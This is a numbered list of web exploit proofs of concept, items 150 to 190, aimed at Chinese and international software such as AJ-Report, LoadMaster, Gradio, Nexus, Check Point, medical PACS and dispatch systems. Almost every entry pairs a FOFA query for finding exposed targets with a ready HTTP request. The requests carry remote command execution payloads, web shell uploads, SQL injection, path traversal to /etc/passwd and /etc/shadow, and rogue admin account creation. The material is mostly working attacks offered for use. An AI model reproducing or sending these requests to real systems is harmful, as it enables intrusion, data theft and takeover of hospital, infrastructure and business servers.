POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. Meite CRM (美特CRM) upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field carries the file content, which must be base64 encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. Huixiaoyuan / Anxiaoyi (慧校园(安校易)) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean Value Management System (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing EHR (宏景EHR) OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing EHR (宏景EHR) downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing EHR (宏景EHR) DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申信息科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (广州图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor Tianyi (瑞友天翼) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system used in photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

